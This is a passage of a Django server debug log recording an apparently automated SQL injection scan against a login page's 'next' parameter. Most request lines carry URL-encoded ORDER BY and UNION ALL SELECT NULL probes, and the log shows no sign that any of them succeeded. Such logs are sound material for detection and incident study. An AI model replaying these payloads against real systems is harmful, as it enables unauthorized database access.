15:25:13] "GET /login/?next=%2F%20ORDER%20BY%2023--%20NvGd HTTP/1.0" 200 1834 DEBUG 2020-01-01 15:25:13,337 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l3ne1o3demrkajjyyeyj1b5aoybgvnal' LIMIT 1; args=('l3ne1o3demrkajjyyeyj1b5aoybgvnal',) DEBUG 2020-01-01 15:25:13,339 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l3ne1o3demrkajjyyeyj1b5aoybgvnal', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:13.338356+00:00'::timestamptz); args=('l3ne1o3demrkajjyyeyj1b5aoybgvnal', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 13, 338356, tzinfo=)) [01/Jan/2020 15:25:13] "GET /login/?next=%2F%20ORDER%20BY%2024--%20mmQj HTTP/1.0" 200 1834 DEBUG 2020-01-01 15:25:13,546 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rwjtaaz4w97fa2slh8faknlzjtopcb1o' LIMIT 1; args=('rwjtaaz4w97fa2slh8faknlzjtopcb1o',) DEBUG 2020-01-01 15:25:13,549 utils 2749 140297233225472 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rwjtaaz4w97fa2slh8faknlzjtopcb1o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:13.547345+00:00'::timestamptz); args=('rwjtaaz4w97fa2slh8faknlzjtopcb1o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 13, 547345, tzinfo=)) [01/Jan/2020 15:25:13] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27NUAAeVDtVdJFkqbcOpvokMInLTItHFNdQjhMuCFT%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20sxmG HTTP/1.0" 200 2338 [01/Jan/2020 15:25:13] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 15:25:13,728 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'hl8fdwvvjbfkdii2h1rfm7yq96cjwg5r' LIMIT 1; args=('hl8fdwvvjbfkdii2h1rfm7yq96cjwg5r',) DEBUG 2020-01-01 15:25:13,732 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('hl8fdwvvjbfkdii2h1rfm7yq96cjwg5r', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:13.729750+00:00'::timestamptz); args=('hl8fdwvvjbfkdii2h1rfm7yq96cjwg5r', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 13, 729750, tzinfo=)) [01/Jan/2020 15:25:13] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27UTQWwVtSuXxTeAdHkIdHpXIWKzRMrmjXQCcrVxBp%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20qLjo HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:13,897 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2081m383nly3lnb44w5ch2exrbhlrhxa' LIMIT 1; args=('2081m383nly3lnb44w5ch2exrbhlrhxa',) DEBUG 2020-01-01 15:25:13,900 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2081m383nly3lnb44w5ch2exrbhlrhxa', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:13.898326+00:00'::timestamptz); args=('2081m383nly3lnb44w5ch2exrbhlrhxa', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 13, 898326, tzinfo=)) [01/Jan/2020 15:25:13] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27mDAhMREESaRPaYYUOODonKqzzKDFNjoLUmoDLObh%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20JGNW HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:14,041 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qs3zbtj0ifrpov1e50whgujuqknqh0l3' LIMIT 1; args=('qs3zbtj0ifrpov1e50whgujuqknqh0l3',) DEBUG 2020-01-01 15:25:14,044 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qs3zbtj0ifrpov1e50whgujuqknqh0l3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:14.042349+00:00'::timestamptz); args=('qs3zbtj0ifrpov1e50whgujuqknqh0l3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 14, 42349, tzinfo=)) [01/Jan/2020 15:25:14] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27hJDLpESvbcdtkSFWRkWQiezmJLfPEwFZDRuyNzvV%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20CysE HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:14,260 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'xmzic4zbjurbh0foe858u82n5e8vmm3b' LIMIT 1; args=('xmzic4zbjurbh0foe858u82n5e8vmm3b',) DEBUG 2020-01-01 15:25:14,263 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('xmzic4zbjurbh0foe858u82n5e8vmm3b', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:14.261112+00:00'::timestamptz); args=('xmzic4zbjurbh0foe858u82n5e8vmm3b', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 14, 261112, tzinfo=)) [01/Jan/2020 15:25:14] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27eOTiSZUiyuZYIEcaSmVKwAMGdcmcbaXcrYuLqCdm%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20qDnN HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:14,423 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ipdgx47ize68fz6yi510gpvb2chydpjv' LIMIT 1; args=('ipdgx47ize68fz6yi510gpvb2chydpjv',) DEBUG 2020-01-01 15:25:14,426 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ipdgx47ize68fz6yi510gpvb2chydpjv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:14.424282+00:00'::timestamptz); args=('ipdgx47ize68fz6yi510gpvb2chydpjv', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 14, 424282, tzinfo=)) [01/Jan/2020 15:25:14] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27NPZoxVVsfNZPyfWRqQipOrkMsuQmGZIgURLGOZbA%27%7C%7C%27qppzq%27%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20TMPz HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:14,562 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3wo4c2hry42xcbz3ujzo6bvw6or60acu' LIMIT 1; args=('3wo4c2hry42xcbz3ujzo6bvw6or60acu',) DEBUG 2020-01-01 15:25:14,564 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3wo4c2hry42xcbz3ujzo6bvw6or60acu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:14.563438+00:00'::timestamptz); args=('3wo4c2hry42xcbz3ujzo6bvw6or60acu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 14, 563438, tzinfo=)) [01/Jan/2020 15:25:14] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27dJNiYxIlDheMZIjYblBBEGoZIraGKBeabgFEqlWx%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20DJFW HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:14,728 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pswgeukyjpwojgby71t1i00h0g7w47q1' LIMIT 1; args=('pswgeukyjpwojgby71t1i00h0g7w47q1',) DEBUG 2020-01-01 15:25:14,729 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pswgeukyjpwojgby71t1i00h0g7w47q1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:14.728653+00:00'::timestamptz); args=('pswgeukyjpwojgby71t1i00h0g7w47q1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 14, 728653, tzinfo=)) [01/Jan/2020 15:25:14] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27GAqsuINlxXTRzHDtJMVOYrbtJFbVzbwJhSwnOQig%27%7C%7C%27qppzq%27%2CNULL%20FROM%20MSysAccessObjects--%20LRnr HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:14,921 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ulwwlqk3h13tzq1p5q4oekqgonapamc6' LIMIT 1; args=('ulwwlqk3h13tzq1p5q4oekqgonapamc6',) DEBUG 2020-01-01 15:25:14,923 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ulwwlqk3h13tzq1p5q4oekqgonapamc6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:14.921792+00:00'::timestamptz); args=('ulwwlqk3h13tzq1p5q4oekqgonapamc6', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 14, 921792, tzinfo=)) [01/Jan/2020 15:25:14] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27pEVvfOqDLpYYPiVCpAmwVKTEMNCQkwnTmYtiTJac%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20cVeK HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:15,106 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ga37tqpy8uxtk5wq0zeagdn9bgf61vsc' LIMIT 1; args=('ga37tqpy8uxtk5wq0zeagdn9bgf61vsc',) DEBUG 2020-01-01 15:25:15,108 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ga37tqpy8uxtk5wq0zeagdn9bgf61vsc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:15.107270+00:00'::timestamptz); args=('ga37tqpy8uxtk5wq0zeagdn9bgf61vsc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 15, 107270, tzinfo=)) [01/Jan/2020 15:25:15] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27SDTJaxRYJZQJFIpZGRtRReTiHlsxMvWHnnGvLBrH%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20xFzi HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:15,246 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qatoptfaqeffvwc93rttqedla7oowh2t' LIMIT 1; args=('qatoptfaqeffvwc93rttqedla7oowh2t',) DEBUG 2020-01-01 15:25:15,248 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qatoptfaqeffvwc93rttqedla7oowh2t', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:15.247363+00:00'::timestamptz); args=('qatoptfaqeffvwc93rttqedla7oowh2t', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 15, 247363, tzinfo=)) [01/Jan/2020 15:25:15] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27rzpkxhkUPDPJUIpdOPlSNRIZwOlULjdSmyeslaHE%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20WlpF HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:15,385 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '65p9tzkoka6xrmwuepb03oufck7bh8ui' LIMIT 1; args=('65p9tzkoka6xrmwuepb03oufck7bh8ui',) DEBUG 2020-01-01 15:25:15,387 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('65p9tzkoka6xrmwuepb03oufck7bh8ui', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:15.385946+00:00'::timestamptz); args=('65p9tzkoka6xrmwuepb03oufck7bh8ui', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 15, 385946, tzinfo=)) [01/Jan/2020 15:25:15] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27hvxmpZvHSVkMozTDvvTYyVKqwZubOmzYcPwVVSRX%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20ccib HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:15,550 utils 2749 140297233225472 (0.006) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'eeonq4g2w67snho9y98m0izpl7yxc086' LIMIT 1; args=('eeonq4g2w67snho9y98m0izpl7yxc086',) DEBUG 2020-01-01 15:25:15,553 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('eeonq4g2w67snho9y98m0izpl7yxc086', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:15.551426+00:00'::timestamptz); args=('eeonq4g2w67snho9y98m0izpl7yxc086', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 15, 551426, tzinfo=)) [01/Jan/2020 15:25:15] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27xhANisvhdmFXCYVgGKSCaTYzgbMICvFgnHYulfeo%27%7C%7C%27qppzq%27%20FROM%20MSysAccessObjects--%20ZUkB HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:15,703 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'i6wvci9bnd8hgwt5rha8bt9nh5z0ezsn' LIMIT 1; args=('i6wvci9bnd8hgwt5rha8bt9nh5z0ezsn',) DEBUG 2020-01-01 15:25:15,705 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('i6wvci9bnd8hgwt5rha8bt9nh5z0ezsn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:15.703776+00:00'::timestamptz); args=('i6wvci9bnd8hgwt5rha8bt9nh5z0ezsn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 15, 703776, tzinfo=)) [01/Jan/2020 15:25:15] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27WmTUXRUFFCZsTrddRaLxcqojlEKeJCWNvSKocYKE%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20CPXO HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:15,867 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '34mjuenf21cqozetv4bfttk7gzhd5nsa' LIMIT 1; args=('34mjuenf21cqozetv4bfttk7gzhd5nsa',) DEBUG 2020-01-01 15:25:15,870 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('34mjuenf21cqozetv4bfttk7gzhd5nsa', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:15.868385+00:00'::timestamptz); args=('34mjuenf21cqozetv4bfttk7gzhd5nsa', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 15, 868385, tzinfo=)) [01/Jan/2020 15:25:15] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2C%27qxvkq%27%7C%7C%27rzxrhJakBhGzhyAYpcOgyvdXQPRJlajXKpaaUmdV%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20gpBN HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:16,039 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'd1juktyc19xr91cj9nwbkfdhppf4fh2n' LIMIT 1; args=('d1juktyc19xr91cj9nwbkfdhppf4fh2n',) DEBUG 2020-01-01 15:25:16,041 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('d1juktyc19xr91cj9nwbkfdhppf4fh2n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:16.039761+00:00'::timestamptz); args=('d1juktyc19xr91cj9nwbkfdhppf4fh2n', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 16, 39761, tzinfo=)) [01/Jan/2020 15:25:16] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27qxvkq%27%7C%7C%27fIiyhSzQvotZKTwLsCQVqyOeDIwnRKXgOapBhYqI%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20WGlc HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:16,211 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'bsfxr9vlsyun5pk8dg7c0zxn59kffci4' LIMIT 1; args=('bsfxr9vlsyun5pk8dg7c0zxn59kffci4',) DEBUG 2020-01-01 15:25:16,214 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('bsfxr9vlsyun5pk8dg7c0zxn59kffci4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:16.212212+00:00'::timestamptz); args=('bsfxr9vlsyun5pk8dg7c0zxn59kffci4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 16, 212212, tzinfo=)) [01/Jan/2020 15:25:16] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%27qxvkq%27%7C%7C%27JJuohEWoczntgkrZExoTcscRILawQtWMtKPLIsFa%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20TOeE HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:16,385 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fh80xhiwy1yobgmewx5kgu9d0qc060kq' LIMIT 1; args=('fh80xhiwy1yobgmewx5kgu9d0qc060kq',) DEBUG 2020-01-01 15:25:16,387 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fh80xhiwy1yobgmewx5kgu9d0qc060kq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:16.385922+00:00'::timestamptz); args=('fh80xhiwy1yobgmewx5kgu9d0qc060kq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 16, 385922, tzinfo=)) [01/Jan/2020 15:25:16] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20%27qxvkq%27%7C%7C%27yqhKTkSscuAVKsKiqkZZIaERDqBdAUdVdcvkPZrQ%27%7C%7C%27qppzq%27%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects--%20phuY HTTP/1.0" 200 2338 DEBUG 2020-01-01 15:25:16,546 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ljju5sx9fen7xjdejgs9el83gj2xpjzw' LIMIT 1; args=('ljju5sx9fen7xjdejgs9el83gj2xpjzw',) DEBUG 2020-01-01 15:25:16,548 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ljju5sx9fen7xjdejgs9el83gj2xpjzw', 